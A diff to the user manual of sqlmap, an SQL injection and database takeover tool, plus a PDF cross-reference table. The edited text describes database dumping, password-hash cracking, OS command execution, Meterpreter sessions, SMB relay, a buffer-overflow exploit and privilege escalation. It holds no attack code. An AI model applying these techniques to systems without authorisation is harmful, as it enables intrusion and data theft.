n +0000078020 00000 n +0000078275 00000 n +0000078707 00000 n +0000078917 00000 n +0000079129 00000 n +0000079346 00000 n +0000079664 00000 n +0000073684 00000 n +0000070245 00000 n +0000079552 00000 n +0000075499 00000 n +0000076508 00000 n +0000077118 00000 n +0000078492 00000 n +0000082935 00000 n +0000083165 00000 n +0000083344 00000 n +0000083534 00000 n +0000083715 00000 n +0000083927 00000 n +0000084120 00000 n +0000086561 00000 n +0000084522 00000 n +0000082748 00000 n +0000079788 00000 n +0000084354 00000 n +0000086743 00000 n +0000086920 00000 n +0000087310 00000 n +0000087503 00000 n +0000087706 00000 n +0000087906 00000 n +0000088097 00000 n +0000088500 00000 n +0000086358 00000 n +0000084646 00000 n +0000088276 00000 n +0000087116 00000 n +0000324217 00000 n +0000090725 00000 n +0000090550 00000 n +0000088637 00000 n +0000090669 00000 n +0000092542 00000 n +0000092367 00000 n +0000090823 00000 n +0000092486 00000 n +0000094367 00000 n +0000094192 00000 n +0000092640 00000 n +0000094311 00000 n +0000096647 00000 n +0000096823 00000 n +0000097312 00000 n +0000096500 00000 n +0000094465 00000 n +0000097033 00000 n +0000099596 00000 n +0000099251 00000 n +0000097449 00000 n +0000099370 00000 n +0000102596 00000 n +0000102250 00000 n +0000099707 00000 n +0000102369 00000 n +0000324335 00000 n +0000105434 00000 n +0000105032 00000 n +0000102720 00000 n +0000105151 00000 n +0000108117 00000 n +0000108291 00000 n +0000108802 00000 n +0000107970 00000 n +0000105558 00000 n +0000108461 00000 n +0000111164 00000 n +0000110704 00000 n +0000108913 00000 n +0000110823 00000 n +0000113539 00000 n +0000114184 00000 n +0000113400 00000 n +0000111314 00000 n +0000113729 00000 n +0000116525 00000 n +0000116293 00000 n +0000114308 00000 n +0000116412 00000 n +0000118941 00000 n +0000118481 00000 n +0000116649 00000 n +0000118600 00000 n +0000324453 00000 n +0000122248 00000 n +0000121789 00000 n +0000119065 00000 n +0000121908 00000 n +0000125015 00000 n +0000125579 00000 n +0000124876 00000 n +0000122359 00000 n +0000125239 00000 n +0000127984 00000 n +0000127581 00000 n +0000125690 00000 n +0000127700 00000 n +0000130423 00000 n +0000130020 00000 n +0000128095 00000 n +0000130139 00000 n +0000132757 00000 n +0000132468 00000 n +0000130521 00000 n +0000132587 00000 n +0000136161 00000 n +0000135815 00000 n +0000132868 00000 n +0000135934 00000 n +0000324571 00000 n +0000138337 00000 n +0000137935 00000 n +0000136272 00000 n +0000138054 00000 n +0000140940 00000 n +0000143504 00000 n +0000141420 00000 n +0000140801 00000 n +0000138461 00000 n +0000141194 00000 n +0000143758 00000 n +0000144123 00000 n +0000143357 00000 n +0000141544 00000 n +0000144012 00000 n +0000146988 00000 n +0000147412 00000 n +0000146849 00000 n +0000144234 00000 n +0000147242 00000 n +0000150913 00000 n +0000151125 00000 n +0000151545 00000 n +0000151800 00000 n +0000152159 00000 n +0000150742 00000 n +0000147549 00000 n +0000152046 00000 n +0000151336 00000 n +0000154607 00000 n +0000154825 00000 n +0000155491 00000 n +0000154460 00000 n +0000152283 00000 n +0000155036 00000 n +0000324689 00000 n +0000158159 00000 n +0000157814 00000 n +0000155615 00000 n +0000157933 00000 n +0000160758 00000 n +0000160184 00000 n +0000158283 00000 n +0000160303 00000 n +0000162577 00000 n +0000162778 00000 n +0000162967 00000 n +0000163146 00000 n +0000163354 00000 n +0000163534 00000 n +0000164195 00000 n +0000162398 00000 n +0000160869 00000 n +0000163741 00000 n +0000164306 00000 n +0000164341 00000 n +0000164626 00000 n +0000164901 00000 n +0000165081 00000 n +0000165314 00000 n +0000165512 00000 n +0000165704 00000 n +0000166066 00000 n +0000166376 00000 n +0000166676 00000 n +0000167032 00000 n +0000167362 00000 n +0000167688 00000 n +0000168039 00000 n +0000168323 00000 n +0000168695 00000 n +0000169042 00000 n +0000169448 00000 n +0000169784 00000 n +0000170079 00000 n +0000170372 00000 n +0000170666 00000 n +0000170933 00000 n +0000171251 00000 n +0000171525 00000 n +0000171822 00000 n +0000172139 00000 n +0000172449 00000 n +0000172717 00000 n +0000173013 00000 n +0000173342 00000 n +0000173595 00000 n +0000173942 00000 n +0000174248 00000 n +0000174519 00000 n +0000174838 00000 n +0000175128 00000 n +0000175391 00000 n +0000175672 00000 n +0000175931 00000 n +0000176228 00000 n +0000176514 00000 n +0000176833 00000 n +0000177130 00000 n +0000177454 00000 n +0000177962 00000 n +0000178343 00000 n +0000178812 00000 n +0000179442 00000 n +0000179701 00000 n +0000179957 00000 n +0000180208 00000 n +0000180384 00000 n +0000180634 00000 n +0000180827 00000 n +0000181020 00000 n +0000181246 00000 n +0000181429 00000 n +0000181624 00000 n +0000181842 00000 n +0000182082 00000 n +0000182276 00000 n +0000182484 00000 n +0000182662 00000 n +0000182891 00000 n +0000183079 00000 n +0000183303 00000 n +0000183488 00000 n +0000183672 00000 n +0000183866 00000 n +0000184181 00000 n +0000184475 00000 n +0000184731 00000 n +0000184987 00000 n +0000185249 00000 n +0000185524 00000 n +0000185778 00000 n +0000186007 00000 n +0000186234 00000 n +0000186513 00000 n +0000186715 00000 n +0000186905 00000 n +0000187202 00000 n +0000187413 00000 n +0000187667 00000 n +0000187931 00000 n +0000188169 00000 n +0000188420 00000 n +0000188687 00000 n +0000188957 00000 n +0000189245 00000 n +0000189455 00000 n +0000189701 00000 n +0000189954 00000 n +0000190217 00000 n +0000190507 00000 n +0000190771 00000 n +0000191030 00000 n +0000191292 00000 n +0000191559 00000 n +0000191811 00000 n +0000192083 00000 n +0000192342 00000 n +0000192573 00000 n +0000192889 00000 n +0000193127 00000 n +0000193342 00000 n +0000193576 00000 n +0000193859 00000 n +0000194056 00000 n +0000194297 00000 n +0000194526 00000 n +0000194775 00000 n +0000195051 00000 n +0000195326 00000 n +0000195562 00000 n +0000195821 00000 n +0000196044 00000 n +0000196262 00000 n +0000196513 00000 n +0000196762 00000 n +0000197028 00000 n +0000197320 00000 n +0000197559 00000 n +0000197830 00000 n +0000198045 00000 n +0000198328 00000 n +0000198618 00000 n +0000198881 00000 n +0000199151 00000 n +0000199449 00000 n +0000199709 00000 n +0000199989 00000 n +0000200539 00000 n +0000201084 00000 n +0000201606 00000 n +0000202764 00000 n +0000202788 00000 n +0000202975 00000 n +0000203153 00000 n +0000203422 00000 n +0000203739 00000 n +0000204050 00000 n +0000204340 00000 n +0000204595 00000 n +0000204977 00000 n +0000205163 00000 n +0000205523 00000 n +0000205891 00000 n +0000206224 00000 n +0000206610 00000 n +0000206854 00000 n +0000207144 00000 n +0000207604 00000 n +0000207918 00000 n +0000208229 00000 n +0000208525 00000 n +0000208828 00000 n +0000209136 00000 n +0000209385 00000 n +0000209748 00000 n +0000209997 00000 n +0000210210 00000 n +0000210478 00000 n +0000210780 00000 n +0000210969 00000 n +0000211260 00000 n +0000211504 00000 n +0000211799 00000 n +0000212108 00000 n +0000212427 00000 n +0000212670 00000 n +0000212975 00000 n +0000213230 00000 n +0000213478 00000 n +0000213776 00000 n +0000214134 00000 n +0000214483 00000 n +0000214773 00000 n +0000215066 00000 n +0000215274 00000 n +0000215622 00000 n +0000215962 00000 n +0000216260 00000 n +0000216595 00000 n +0000216941 00000 n +0000217237 00000 n +0000217609 00000 n +0000218211 00000 n +0000218628 00000 n +0000219068 00000 n +0000219828 00000 n +0000220102 00000 n +0000220371 00000 n +0000220567 00000 n +0000220765 00000 n +0000220951 00000 n +0000221169 00000 n +0000221350 00000 n +0000221589 00000 n +0000221778 00000 n +0000222015 00000 n +0000222207 00000 n +0000222392 00000 n +0000222642 00000 n +0000222963 00000 n +0000223308 00000 n +0000223581 00000 n +0000223847 00000 n +0000224119 00000 n +0000224419 00000 n +0000224684 00000 n +0000224913 00000 n +0000225140 00000 n +0000225449 00000 n +0000225651 00000 n +0000225841 00000 n +0000226079 00000 n +0000226379 00000 n +0000226584 00000 n +0000226843 00000 n +0000227119 00000 n +0000227371 00000 n +0000227627 00000 n +0000227918 00000 n +0000228197 00000 n +0000228515 00000 n +0000228721 00000 n +0000228970 00000 n +0000229241 00000 n +0000229520 00000 n +0000229794 00000 n +0000230067 00000 n +0000230336 00000 n +0000230600 00000 n +0000230875 00000 n +0000231158 00000 n +0000231394 00000 n +0000231729 00000 n +0000231972 00000 n +0000232186 00000 n +0000232437 00000 n +0000232717 00000 n +0000232914 00000 n +0000233167 00000 n +0000233404 00000 n +0000233669 00000 n +0000233951 00000 n +0000234244 00000 n +0000234484 00000 n +0000234751 00000 n +0000234988 00000 n +0000235218 00000 n +0000235486 00000 n +0000235742 00000 n +0000236026 00000 n +0000236345 00000 n +0000236630 00000 n +0000236853 00000 n +0000237157 00000 n +0000237465 00000 n +0000237728 00000 n +0000238017 00000 n +0000238340 00000 n +0000238605 00000 n +0000238900 00000 n +0000239481 00000 n +0000239976 00000 n +0000240496 00000 n +0000241592 00000 n +0000241874 00000 n +0000242152 00000 n +0000242337 00000 n +0000242560 00000 n +0000242785 00000 n +0000242969 00000 n +0000243162 00000 n +0000243340 00000 n +0000243515 00000 n +0000243767 00000 n +0000244035 00000 n +0000244272 00000 n +0000244682 00000 n +0000245020 00000 n +0000245310 00000 n +0000245655 00000 n +0000245933 00000 n +0000246199 00000 n +0000246440 00000 n +0000246784 00000 n +0000246988 00000 n +0000247171 00000 n +0000247420 00000 n +0000247765 00000 n +0000247985 00000 n +0000248320 00000 n +0000248663 00000 n +0000248994 00000 n +0000249241 00000 n +0000249640 00000 n +0000249955 00000 n +0000250300 00000 n +0000250534 00000 n +0000250812 00000 n +0000251239 00000 n +0000251520 00000 n +0000251793 00000 n +0000252059 00000 n +0000252337 00000 n +0000252610 00000 n +0000252847 00000 n +0000253193 00000 n +0000253432 00000 n +0000253636 00000 n +0000253891 00000 n +0000254171 00000 n +0000254358 00000 n +0000254628 00000 n +0000254861 00000 n +0000255119 00000 n +0000255393 00000 n +0000255675 00000 n +0000255901 00000 n +0000256170 00000 n +0000256402 00000 n +0000256633 00000 n +0000256914 00000 n +0000257232 00000 n +0000257528 00000 n +0000257855 00000 n +0000258137 00000 n +0000258407 00000 n +0000258611 00000 n +0000258924 00000 n +0000259243 00000 n +0000259513 00000 n +0000259824 00000 n +0000260141 00000 n +0000260423 00000 n +0000260757 00000 n +0000261330 00000 n +0000261832 00000 n +0000262309 00000 n +0000263350 00000 n +0000263759 00000 n +0000264179 00000 n +0000264519 00000 n +0000264793 00000 n +0000264998 00000 n +0000265185 00000 n +0000265424 00000 n +0000265739 00000 n +0000266091 00000 n +0000266416 00000 n +0000266751 00000 n +0000267077 00000 n +0000267483 00000 n +0000267751 00000 n +0000267971 00000 n +0000268160 00000 n +0000268474 00000 n +0000268740 00000 n +0000269053 00000 n +0000269390 00000 n +0000269641 00000 n +0000269982 00000 n +0000270250 00000 n +0000270519 00000 n +0000270910 00000 n +0000271302 00000 n +0000271521 00000 n +0000271904 00000 n +0000272291 00000 n +0000272598 00000 n +0000272965 00000 n +0000273361 00000 n +0000273682 00000 n +0000274357 00000 n +0000274664 00000 n +0000275066 00000 n +0000275582 00000 n +0000275766 00000 n +0000275933 00000 n +0000276119 00000 n +0000276384 00000 n +0000276645 00000 n +0000276914 00000 n +0000277189 00000 n +0000277412 00000 n +0000277589 00000 n +0000277760 00000 n +0000278007 00000 n +0000278226 00000 n +0000278498 00000 n +0000278769 00000 n +0000279040 00000 n +0000279255 00000 n +0000279525 00000 n +0000279740 00000 n +0000280202 00000 n +0000280450 00000 n +0000280686 00000 n +0000280990 00000 n +0000281261 00000 n +0000281531 00000 n +0000281716 00000 n +0000281907 00000 n +0000282119 00000 n +0000282332 00000 n +0000282508 00000 n +0000282743 00000 n +0000282926 00000 n +0000283148 00000 n +0000283337 00000 n +0000283513 00000 n +0000283717 00000 n +0000283971 00000 n +0000284228 00000 n +0000284463 00000 n +0000284753 00000 n +0000285165 00000 n +0000285482 00000 n +0000285773 00000 n +0000286115 00000 n +0000286391 00000 n +0000286654 00000 n +0000286902 00000 n +0000287238 00000 n +0000287445 00000 n +0000287633 00000 n +0000287880 00000 n +0000288205 00000 n +0000288427 00000 n +0000288753 00000 n +0000289078 00000 n +0000289399 00000 n +0000289648 00000 n +0000290039 00000 n +0000290342 00000 n +0000290680 00000 n +0000290912 00000 n +0000291185 00000 n +0000291507 00000 n +0000291896 00000 n +0000292257 00000 n +0000292570 00000 n +0000292856 00000 n +0000293136 00000 n +0000293400 00000 n +0000293680 00000 n +0000293951 00000 n +0000294174 00000 n +0000294493 00000 n +0000294730 00000 n +0000294934 00000 n +0000295166 00000 n +0000295444 00000 n +0000295634 00000 n +0000295893 00000 n +0000296122 00000 n +0000296392 00000 n +0000296670 00000 n +0000296954 00000 n +0000297176 00000 n +0000297453 00000 n +0000297686 00000 n +0000297921 00000 n +0000298186 00000 n +0000298501 00000 n +0000298793 00000 n +0000299094 00000 n +0000299359 00000 n +0000299629 00000 n +0000299832 00000 n +0000300142 00000 n +0000300459 00000 n +0000300729 00000 n +0000301037 00000 n +0000301362 00000 n +0000301641 00000 n +0000301988 00000 n +0000302561 00000 n +0000303086 00000 n +0000303581 00000 n +0000304734 00000 n +0000304936 00000 n +0000305306 00000 n +0000305695 00000 n +0000305872 00000 n +0000306211 00000 n +0000306480 00000 n +0000306856 00000 n +0000307227 00000 n +0000307483 00000 n +0000307855 00000 n +0000308378 00000 n +0000308602 00000 n +0000308790 00000 n +0000308977 00000 n +0000316120 00000 n +0000316355 00000 n +0000323463 00000 n +0000324791 00000 n +0000324911 00000 n +0000324990 00000 n +0000325063 00000 n +0000335864 00000 n +0000336038 00000 n +0000336209 00000 n +0000336378 00000 n +0000336547 00000 n +0000336718 00000 n +0000336888 00000 n +0000337059 00000 n +0000337240 00000 n +0000337447 00000 n +0000337668 00000 n +0000337894 00000 n +0000338126 00000 n +0000338353 00000 n +0000338612 00000 n +0000338887 00000 n +0000339162 00000 n +0000339437 00000 n +0000339707 00000 n +0000339976 00000 n +0000340246 00000 n +0000340513 00000 n +0000340780 00000 n +0000341047 00000 n +0000341316 00000 n +0000341589 00000 n +0000341856 00000 n +0000341973 00000 n +0000342091 00000 n +0000342213 00000 n +0000342348 00000 n +0000342489 00000 n +0000342603 00000 n +0000342724 00000 n +0000342764 00000 n +0000342896 00000 n trailer -<< /Size 1547 -/Root 1545 0 R -/Info 1546 0 R -/ID [<066144FDFF15BEC566E15D0F3E3473BF> <066144FDFF15BEC566E15D0F3E3473BF>] >> +<< /Size 1414 +/Root 1412 0 R +/Info 1413 0 R +/ID [<23380BE31435F622CDDE7F34D8B7B8B6> <23380BE31435F622CDDE7F34D8B7B8B6>] >> startxref -420312 +343211 %%EOF diff --git a/doc/README.sgml b/doc/README.sgml index f4446a5af..65929b3f2 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -15,7 +15,13 @@ This document is the user's manual to use -Microsoft Access: -Microsoft SQL Server or Sybase: -MySQL: -Oracle: -PostgreSQL: -SQLite: +Firebird: . +Microsoft Access: . +Microsoft SQL Server: . +MySQL: . +Oracle: . +PostgreSQL: . +SQLite: . +Sybase: . If you plan to attack a web application behind NTLM authentication or use -the sqlmap update functionality (--update switch) you need to +the sqlmap update functionality (--update switch) you need to install respectively and libraries. @@ -74,6 +81,7 @@ You can also choose to install library to eventually speed up the sqlmap algorithmic operations. + Scenario Detect and exploit a SQL injection @@ -175,7 +183,8 @@ database via a SQL injection vulnerability. Techniques

    -sqlmap is able to detect and exploit five SQL injection families: +sqlmap is able to detect and exploit five different SQL injection +types: Boolean-based blind SQL injection, also known as inferential @@ -240,7 +249,7 @@ url="http://www.youtube.com/user/inquisb#g/u" name="YouTube">. Features

    -TODO: Features implemented in sqlmap include: +Features implemented in sqlmap include: Generic features @@ -256,76 +265,83 @@ management systems. blind, time-based blind, error-based, UNION query and stacked queries. +Support to directly connect to the database without passing +via a SQL injection, by providing DBMS credentials, IP address, port and +database name. + It is possible to provide a single target URL, get the list of targets from -requests log file or - conversations/ folder, get the whole HTTP -request from a text file or get the list of targets by providing sqlmap -with a Google dork which queries requests log files, get the whole HTTP request +from a text file or get the list of targets by providing sqlmap with a +Google dork which queries search engine and parses its results page. You can also define a regular-expression based scope that is used to identify which of the parsed addresses to test. Tests provided GET parameters, POST parameters, HTTP Cookie header values, HTTP User-Agent header value -and HTTP Referer header value to find the dynamic ones, which means -those that vary the HTTP response page content. -On the dynamic ones sqlmap automatically tests and detects the ones -affected by SQL injection. Each dynamic parameter is tested for -numeric, single quoted string, double quoted -string and all of these three data-types with zero to two parenthesis -to correctly detect which is the SELECT statement syntax to -perform further injections with. It is also possible to specify the only -parameter(s) that you want to perform tests and use for injection on. +and HTTP Referer header value to identify and exploit SQL +injection vulnerabilities. It is also possible to specify a comma-separated +list of specific parameter(s) to test. -Option to specify the maximum number of concurrent HTTP -requests to speed up the inferential blind SQL injection algorithms -(multi-threading). It is also possible to specify the number of seconds to -wait between each HTTP request. +Option to specify the maximum number of concurrent HTTP(S) +requests (multi-threading) to speed up the blind SQL injection +techniques. It is also possible to specify the number of seconds to +hold between each HTTP(S) request. HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection -on such header. You can also specify to always URL-encode the Cookie -header. +on such header values. You can also specify to always URL-encode the +Cookie. -Automatically handle HTTP Set-Cookie header from +Automatically handles HTTP Set-Cookie header from the application, re-establishing of the session if it expires. Test and -exploit on these values is supported too. You can also force to ignore any -Set-Cookie header. +exploit on these values is supported too. Vice versa, you can also force +to ignore any Set-Cookie header. -HTTP Basic, Digest, NTLM and Certificate authentications -support. +HTTP protocol Basic, Digest, NTLM and Certificate +authentications support. -Anonymous HTTP proxy support to pass by the requests to the -target application that works also with HTTPS requests. +HTTP(S) proxy support to pass by the requests to the target +application that works also with HTTPS requests and with authenticated +proxy servers. Options to fake the HTTP Referer header value and the HTTP User-Agent header value specified by user or -randomly selected from a text file. +randomly selected from a textual file. Support to increase the verbosity level of output messages: -there exist six levels. The default level is 1 in which -information, warnings, errors and tracebacks (if any occur) will be shown. +there exist seven levels of verbosity. -Granularity in the user's options. +Support to parse HTML forms from the target URL and forge +HTTP(S) requests against those pages to test the form parameters against +vulnerabilities. + +Granularity and flexibility in terms of both user's +switches and features. Estimated time of arrival support for each query, updated -in real time while fetching the information to give to the user an -overview on how long it will take to retrieve the output. +in real time, to provide the user with an overview on how long it will +take to retrieve the queries' output. -Automatic support to save the session (queries and their output, -even if partially retrieved) in real time while fetching the data on a -text file and resume the injection from this file in a second -time. +Automatically saves the session (queries and their output, even if +partially retrieved) on a textual file in real time while fetching the +data and resumes the injection by parsing the session file. Support to read options from a configuration INI file rather than -specify each time all of the options on the command line. Support also to -save command line options on a configuration INI file. +specify each time all of the switches on the command line. Support also to +generate a configuration file based on the command line switches provided. -Option to update sqlmap as a whole to the latest development version -from the Subversion repository. +Support to replicate the back-end database tables structure and +entries on a local SQLite 3 database. + +Option to update sqlmap to the latest development version from the +subversion repository. + +Support to parse HTTP(S) responses and display any DBMS error +message to the user. Integration with other IT security open source projects, and . Extensive back-end database software version and underlying operating system fingerprint based upon -, +, , and such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it. -Basic web server software and web application technology fingerprint. +Basic web server software and web application technology +fingerprint. Support to retrieve the DBMS banner, session user and current database information. The tool can also check if the -session user is a database administrator (DBA). +session user is a database administrator (DBA). Support to enumerate database users, users' password -hashes, users' privileges, databases, -tables and columns. +hashes, users' privileges, users' roles, +databases, tables and columns. -Support to dump database tables as a whole or a range of -entries as per user's choice. The user can also choose to dump only -specific column(s). +Automatic recognition of password hashes format and support to +crack them with a dictionary-based attack. -Support to automatically dump all databases' schemas and +Support to brute-force tables and columns name. This is +useful when the session user has no read access over the system table +containing schema information or when the database management system does +not store this information anywhere (e.g. MySQL < 5.0). + +Support to dump database tables entirely, a range of +entries or specific columns as per user's choice. The user can also choose +to dump only a range of characters from each column's entry. + +Support to automatically dump all databases' schemas and entries. It is possibly to exclude from the dump the system databases. -Support to enumerate and dump all databases' tables containing user -provided column(s). Useful to identify for instance tables containing -custom application credentials. +Support to search for specific database names, specific tables +across all databases or specific columns across all databases' +tables. This is useful, for instance, to identify tables containing +custom application credentials where relevant columns' names contain +string like name and pass. Support to run custom SQL statement(s) as in an interactive SQL client connecting to the back-end database. sqlmap automatically -dissects the provided statement, determines which technique to use to +dissects the provided statement, determines which technique fits best to inject it and how to pack the SQL payload accordingly. @@ -378,18 +405,19 @@ inject it and how to pack the SQL payload accordingly.

    Some of these techniques are detailed in the white paper - and in the slide deck . Support to inject custom user-defined functions: the user -can compile shared object then use sqlmap to create within the back-end -DBMS user-defined functions out of the compiled shared object file. These -UDFs can then be executed, and optionally removed, via sqlmap too. +can compile a shared library then use sqlmap to create within the back-end +DBMS user-defined functions out of the compiled shared library file. These +UDFs can then be executed, and optionally removed, via sqlmap. This is +supported when the database software is MySQL or PostgreSQL. -Support to read and upload any file from the database +Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. @@ -401,13 +429,14 @@ when the database software is MySQL, PostgreSQL or Microsoft SQL Server. execution. On Microsoft SQL Server via xp_cmdshell() stored procedure. Also, the stored procedure is re-enabled if disabled or created from -scratch if removed. +scratch if removed by the DBA. Support to establish an out-of-band stateful TCP connection -between the user machine and the database server underlying operating -system. This channel can be an interactive command prompt, a Meterpreter -session or a graphical user interface (VNC) session as per user's choice. +between the attacker machine and the database server underlying +operating system. This channel can be an interactive command prompt, a +Meterpreter session or a graphical user interface (VNC) session as per +user's choice. sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are: @@ -423,14 +452,19 @@ Server. reflection attack () with a UNC path request from the database server to -the user's machine where the Metasploit smb_relay server exploit -runs. +the attacker's machine where the Metasploit smb_relay server +exploit listens. Supported when running sqlmap with high privileges +(uid=0) on Linux/Unix and the target DBMS runs as Administrator +on Windows. Database in-memory execution of the Metasploit's shellcode by exploiting Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow () with automatic DEP bypass. +name="MS09-004">). sqlmap has its own exploit to trigger the +vulnerability with automatic DEP memory protection bypass, but it relies +on Metasploit to generate the shellcode to get executed upon successful +exploitation. Support for database process' user privilege escalation via @@ -439,18 +473,15 @@ the technique () or via by using Meterpreter's -incognito extension. +name="MS10-015">). Support to access (read/add/delete) Windows registry hives. -History +History -2011 +2011

    @@ -462,7 +493,7 @@ server, support for time-based blind SQL injection and error-based SQL injection, support for four new database management systems and much more. -2010 +2010

    @@ -472,7 +503,8 @@ lot during the whole year and prepare to release sqlmap 0.9 within the first quarter of 2011. June 3, Bernardo -a talk titled Got database access? Own the network! at AthCon 2010 in Athens (Greece). +a talk titled Got database access? Own the network! at AthCon +2010 in Athens (Greece). March 14, release stable version of sqlmap 0.8 featuring many features. Amongst these, support to @@ -481,14 +513,14 @@ column(s), stabilization and enhancements to the takeover functionalities, updated integration with Metasploit 3.3.3 and a lot of minor features and bug fixes. March, sqlmap demo videos have been . +name="published" url="http://www.youtube.com/inquisb#g/u">. January, Bernardo is to present at conference in Greece on June 2010. -2009 +2009

    @@ -510,7 +542,7 @@ research on stealth database server takeover at CONfidence 2009 in Warsaw, Poland. September 26, sqlmap version 0.8 release candidate -1 goes public on the goes public on the , with all the attack vectors unveiled at SOURCE Barcelona 2009 Conference. These include an enhanced version of the Microsoft SQL Server buffer overflow exploit to @@ -522,11 +554,14 @@ inject custom user-defined functions. September 21, Bernardo and their research () at SOURCE Conference 2009 in Barcelona, Spain. +url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule"> +their research () +at SOURCE Conference 2009 in Barcelona, Spain. August, Bernardo is accepted as a speaker at two others IT -security conferences, and and . This new research is titled Expanding the control over the operating system from the database. @@ -567,7 +602,7 @@ the database. April 16, Bernardo his research (, ) at Black Hat Europe 2009 in Amsterdam, The Netherlands. The feedback from the audience is good and there has been some SQL injection exploitation internals at a private event in London, UK. -2008 +2008

    @@ -616,7 +651,7 @@ public. This includes minor bug fixes and the first contact between the tool and : an auxiliary module to launch sqlmap from within Metasploit Framework. The goes public again. +name="subversion development repository"> goes public again. September 1, nearly one year after the previous release, sqlmap 0.6 comes to life featuring a complete code @@ -627,11 +662,11 @@ new installation packages for Debian, Red Hat, Windows and much more. August, two public are created on SourceForge. -January, sqlmap Subversion development repository is moved +January, sqlmap subversion development repository is moved away from SourceForge and goes private for a while. -2007 +2007

    @@ -664,7 +699,7 @@ and exploit UNION query SQL injections and injection points in POST parameters. -2006 +2006

    @@ -682,7 +717,7 @@ version 0.1. July 25, registers the sqlmap project on SourceForge and develops it on the . The skeleton is implemented and +name="SourceForge subversion repository">. The skeleton is implemented and limited support for MySQL added. @@ -704,7 +739,7 @@ name="Source zip compressed">.

    You can also checkout the latest development version from the - + repository: @@ -712,7 +747,7 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

    -You can update it to the latest development version anytime by running: +You can update it at any time to the latest development version by running: $ python sqlmap.py --update @@ -729,14 +764,6 @@ This is strongly recommended before reporting any bug to the . -License and copyright - -

    -sqlmap is released under the terms of the -. -sqlmap is copyrighted by its . - - Usage

    @@ -820,9 +847,8 @@ Options: --text-only Compare pages based only on their textual content Techniques: - These options can be used to test for specific SQL injection technique - or to use one of them to exploit the affected parameter(s) rather than - using the default blind SQL injection technique. + These options can be used to tweak how specific SQL injection + techniques are tested. --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection @@ -938,27 +964,27 @@ Switch: -v

    This switch can be used to set the verbosity level of output messages. There exist seven levels of verbosity. -The default level is 1 in which information, warnings, errors, critical messages and Python tracebacks (if any occur) will be displayed. +The default level is 1 in which information, warning, error and critical messages and Python tracebacks (if any occur) will be displayed. -0: Show only critical messages -1: Show also warning and information messages -2: Show also debug messages -3: Show also payloads injected -4: Show also HTTP requests -5: Show also HTTP responses' headers -6: Show also HTTP responses' page content +0: Show only Python tracebacks, error and critical messages. +1: Show also information and warning messages. +2: Show also debug messages. +3: Show also payloads injected. +4: Show also HTTP requests. +5: Show also HTTP responses' headers. +6: Show also HTTP responses' page content.

    -A reasonable level of verbosity to further understand what sqlmap is doing under the hood is level 2, primarily for the detection phase and the take-over functionalities. Whereas if you want to make sure you know which SQL payloads the tools sends, level 3 is your best choice. In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level 4 or above. This level is recommended to be used when you feed the developers with a bug report too. +A reasonable level of verbosity to further understand what sqlmap does under the hood is level 2, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level 3 is your best choice. +In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level 4 or above. This level is recommended to be used when you feed the developers with a bug report too. Target

    -At least one of these options has to be specified to set the source to get -target URLs from. +At least one of these options has to be provided. Target URL @@ -966,7 +992,8 @@ target URLs from. Switch: -u or --url

    -Run sqlmap against a single target URL. +Run sqlmap against a single target URL. This switch requires an argument +which is the target URL in the form http(s)://targeturl/[...]. Parse targets from Burp or WebScarab proxy logs @@ -975,10 +1002,11 @@ Switch: -l

    Rather than providing a single target URL, it is possible to test and -inject on HTTP requests proxied through or . +name="WebScarab proxy"> This switch requires an argument which is the +proxy's HTTP requests log file. Load HTTP request from a file @@ -987,11 +1015,11 @@ Switch: -r

    One of the possibilities of sqlmap is loading of complete HTTP request -stored in textual file. That way you can skip usage of bunch of other +from a textual file. That way you can skip usage of bunch of other options (e.g. setting of cookies, POSTed data, etc).

    -Sample content of a HTTP request file: +Sample content of a HTTP request file provided as argument to this switch: POST /sqlmap/mysql/post_int.php HTTP/1.1 @@ -1053,8 +1081,8 @@ example is sqlmap.conf.

    Note that if you also provide other options from command line, those are -evaluated when running sqlmap and overwrite the same options, if set, in -the provided configuration file. +evaluated when running sqlmap and overwrite those provided in the +configuration file. Request @@ -1062,7 +1090,7 @@ the provided configuration file.

    These options can be used to specify how to connect to the target url. -HTTP method: GET or POST +HTTP data

    Option: --data @@ -1071,16 +1099,18 @@ Option: --data By default the HTTP method used to perform HTTP requests is GET, but you can implicitly change it to POST by providing the data to be sent in the POST requests. Such data, being those parameters, -are tested for SQL injection as well as the GET parameters. +are tested for SQL injection as well as any provided GET +parameters. HTTP Cookie header

    -Switches: --cookie, --cookie-urlencode and --drop-set-cookie +Switches: --cookie, --drop-set-cookie +and --cookie-urlencode

    -This feature can be useful in two scenarios: +This feature can be useful in two ways: The web application requires authentication based upon cookies and @@ -1090,18 +1120,13 @@ you have such data.

    Either reason brings you to need to send cookies with sqlmap requests, the -steps to go through in the second scenario are the following: +steps to go through are the following: -On Firefox web browser login on the web authentication form while -dumping URL requests with browser's extension or by passing through a HTTP proxy -like Burp. -In the horizontal box of the extension select your authentication -transaction then in the left box on the bottom click with the right button -on the Cookie value, then click on Copy to save its -value to the clipboard. -Go back to your shell and run sqlmap by pasting your clipboard to +Login to the application with your favourite browser. +Get the HTTP Cookie from the browser's preferences or from the HTTP +proxy screen and copy to the clipboard. +Go back to your shell and run sqlmap by pasting your clipboard as the argument of the --cookie switch. @@ -1112,35 +1137,35 @@ recognize these as separate sets of parameter=value too, as well as GET and POST parameters.

    -If the web application responds with Set-Cookie headers at any -time during the communication, sqlmap will automatically use its value in +If at any time during the communication, the web application responds with +Set-Cookie headers, sqlmap will automatically use its value in all further HTTP requests as the Cookie header. sqlmap will also -automatically test those values for SQL injection, except if you run it -with --drop-set-cookie option. In the latter case, sqlmap will +automatically test those values for SQL injection. This can be avoided by +providing the switch --drop-set-cookie - sqlmap will ignore any coming Set-Cookie header.

